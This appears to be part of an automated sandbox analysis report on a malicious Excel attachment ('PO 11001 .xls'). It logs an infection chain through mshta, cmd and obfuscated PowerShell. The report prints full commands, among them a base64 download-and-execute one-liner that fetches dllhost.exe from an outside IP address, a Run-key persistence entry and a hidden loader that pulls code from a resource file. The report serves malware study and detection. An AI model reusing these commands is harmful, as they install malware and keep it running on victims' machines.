          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............(..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............:..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............F..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............X..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............d..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............v..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............1..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......@..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......S..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D......._..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......q..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......}..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D....... ..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............5..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............A..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......U..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............a..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............v..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\reg.exeConsole Write: ......................,.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.......N.......................
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSystem information queried: HandleInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Vaccinerende.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Vaccinerende.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: Vaccinerende.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Vaccinerende.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Vaccinerende.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Vaccinerende.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: PO 11001 .xlsReversingLabs: Detection: 28%
          Source: PO 11001 .xlsVirustotal: Detection: 25%
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
